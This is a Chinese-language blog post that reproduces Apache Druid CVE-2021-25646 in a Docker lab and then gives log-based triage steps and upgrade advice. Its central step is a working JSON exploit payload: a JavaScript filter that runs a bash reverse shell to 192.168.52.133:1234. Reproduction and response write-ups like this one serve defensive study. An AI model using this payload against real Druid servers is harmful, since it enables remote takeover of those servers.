Apache Druid 命令执行漏洞(CVE-2021-25646)复现及排查

最新推荐文章于 2024-06-07 12:05:22 发布
最新推荐文章于 2024-06-07 12:05:22 发布
阅读量336 收藏 1
点赞数
分类专栏: 应急响应 渗透 文章标签: apache web安全 安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youuzi/article/details/132299357
版权

目录

概述

影响版本

漏洞复现

环境搭建

漏洞复现

应急排查

加固建议

概述

Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。

在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。

影响版本

Apache Druid < 0.20.1

漏洞复现

环境搭建

在虚拟机安装docker,安装完成后使用以下命令pull漏洞环境

docker pull fokkodriesprong/docker-druid

下载漏洞环境后使用以下命令启动漏洞环境

docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

启动后在浏览器访问http://your-ip:8888/看到以下界面表示成功

 

漏洞复现

在浏览器进入Apache Druid首页如何点击点击左上方Load data -> Local disk按钮

右侧表单填入Base directory:quickstart/tutorial/
File filter:wikiticker-2015-09-12-sampled.json.gz
填入完成点击Preview,然后点击next

 

打开burp进行抓包,然后一直点击next,直到下一步是Next:Filter时,抓取数据包

 

然后替换数据包中的data数据为以下代码,然后修改代码中的exec()方法里的命令,这里为反弹shell指令

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",

"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.52.133/1234 0>&1')}",

"dimension":"added",

"":{

"enabled":"true"

}

}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

应急排查

1、docker logs排查

本环境为docker环境,日志未记录访问日志

2、druid自身调试日志

druid默认的log4j.xml路径为:conf/druid/cluster/_common/log4j2.xml

日志配置可参考:https://cangchen.blog.csdn.net/article/details/117065802?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_default&utm_relevant_index=1

一一查看这些日志文件,未发现有访问路径的入侵痕迹

3、排查需web访问日志,搜索关键字”/druid/indexer/v1/samler?for=filter”

加固建议

1、升级到最新版Apache Druid,下载地址为

https://druid.apache.org/downloads.html

 

 

dayouziei
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Druid未授权访问 漏洞复现
Boom!脑洞大爆炸的博客
11-11 6235
Druid未授权访问 漏洞复现
druid监控页面未授权访问漏洞
m0_37354578的博客
06-30 1万+
一、项目环境 SpringBoot Version:2.4.5 二、问题场景 项目中引入druid-spring-boot-starter,且spring.datasource.druid.stat-view-servlet.enabled配置为true时,可以直接访问Druid Monitor监控平台,可能会造成企业机密信息被攻击者获取 <dependency> <groupId>com.alibaba</groupId> <artifactId&g
上心师傅的思路分享(二)--Druid monitor
最新发布
weixin_72543266的博客
06-07 1139
最近回顾看一下上心师傅在上课时分享的渗透思路,结合我个人的实战案例与利用方式加以总结和记录,其中包含上心师傅上课时讲的我之前遇到过的Springboot报错界面druid的渗透思路以及我自己在springboot界面遇到的漏洞利用方式进总结,下面的思路中的漏洞都是我遇到过的,刚好进一波复盘.免责声明博文中涉及的方法可能带有危害性,博文中的图片中的域名展示仅供参考,并不具有威胁性,仅供安全研究与教学之用,读者将其方法用作做其他用途,由读者承担全部法律及连带责任,文章作者不负任何责任.
CVE-2021-25646Apache Druid执行漏洞
就是法老
08-24 2158
一:漏洞描述 阿里云安全Apache官方报告了Apache Druid执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意。 影响范围:Apache Druid &l
【Java】Druid未授权访问漏洞如何处理
姜太小白的博客
07-06 8745
Druid未授权访问漏洞如何处理
Apache Druid执行漏洞(CVE-2021-25646)
weixin_44047654的博客
12-05 1728
Apache Druid执行漏洞(CVE-2021-25646)
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-22986 F5 BIG-IP-IQ 执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 执行
【技术分享】CVE-2021-25646 Apache Druid 执行漏洞分析 .pdf
09-05
Apache Druid CVE-2021-25646 执行漏洞深度解析》 Apache Druid,作为一个高性能、列式存储的开源分布式数据存储系统,广泛应用于商业智能和OLAP(在线分析处理)场景,以处理大量实时和历史数据。然而,...
Silentsoul04#vulnerability-paper-1#CVE-2021-25646Apache Druid R
07-25
声明:请勿用作违法用途,否则后果自负0x01 简介Druid 不仅是一个数据库连接池,还包含一个 ProxyDriver、一系列内置的 JDBC 组件库、一个
Apache Druid LoadData 任意文件读取 漏洞 CVE-2021-36749
god_Zeo的安全博客
11-17 1156
Apache Druid LoadData 任意文件读取 漏洞 CVE-2021-36749 0x01 漏洞简介 在 Druid 系统中,InputSource 用于从某个数据源读取数据。但是,HTTP InputSource 允许经过身份验证的用户以 Druid 服务器进的权限从其他来源读取数据,例如本地文件系统。 这不是用户直接访问 Druid 时的权限提升,因为 Druid 还提供了 Local InputSource,它允许相同级别的访问。但是当用户通过允许用户指定 HTTP InputSourc
Druid未授权访问漏洞小记
niceling_99的博客
10-26 3935
漏洞说明:Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问. 直接在网站的url中后加上: /druid/index.html 如果可以无需登录,即可登录到Druid监控界面,则说明该网站存在Druid未授权访问漏洞! 下面是某次实测时发现的未授权访问漏洞实例: 解决方法: 在配置文件中禁用druid监控页或添加用户
Apache Druid命令执行漏洞复现
weixin_53696027的博客
06-02 532
CVE-2019-25646是由由阿里云安全发现的 Apache Druid 执行漏洞
【SpringBoot项目】Druid未授权访问漏洞 禁用Druid Monitor
qq_48718409的博客
03-01 3670
漏洞描述 Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。 解决建议 需要同时修改SpringBoot中的application.yml文件和Java中的config配置 如下所示: yml文件文件配置如下: spring: datasource: type: com.alibaba.dr
【垃圾思路拓展】Druid-monitor
Towns的博客
07-14 1406
【那些年错过的getshell】Druid-monitor 【那些年错过的getshell】Druid-monitor 对安全学习了一段时间了,小白对src进一次初探(看到了许多的大佬QWQ,但就差一句“我带你!!!!”),但学业繁忙(也是比较菜),进了一个佛系挖。现在复盘一下,对师傅们的一些技巧进一个总结。 0x01 Druid-monitor未授权访问 啥是Druid-monitor监控系统?Druid是阿里巴巴开源平台上的一个项目,整个项目由数据库连接池、插件框架和SQL解析器组成。该项目主要
druid 命令执行(CVE-2021-25646)
qq_53086690的博客
11-23 1611
druid 命令执行 druid 介绍 Druid是一个专为大型数据集上的高性能切片和OLAP分析而设计的数据存储。Druid最常用作为GUI分析应用序提供动力的数据存储,或者用作需要快速聚合的高度并发API的后端 影响版本 Apache Druid < 0.20.1 漏洞简介 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,
Apache Druid执行漏洞CVE-2021-25646
chaojixiaojingang
03-15 9606
1.漏洞描述 Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用Apache Druid漏洞可以执行任意。 2.影响版本 Apache Druid < 0.20...
Alibaba Druid未授权访问漏洞记录(敏感目录,端口:不确定)
热门推荐
墨痕诉清风的博客
11-12 1万+
1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池.2.Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控.
springboot druid-spring-boot-starter
12-02
`druid-spring-boot-starter`是一个用于在Spring Boot应用序中集成Druid连接池的Starter。Druid是一个高性能的JDBC连接池,具有监控和扩展功能。使用`druid-spring-boot-starter`可以轻松地将Druid连接池集成到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值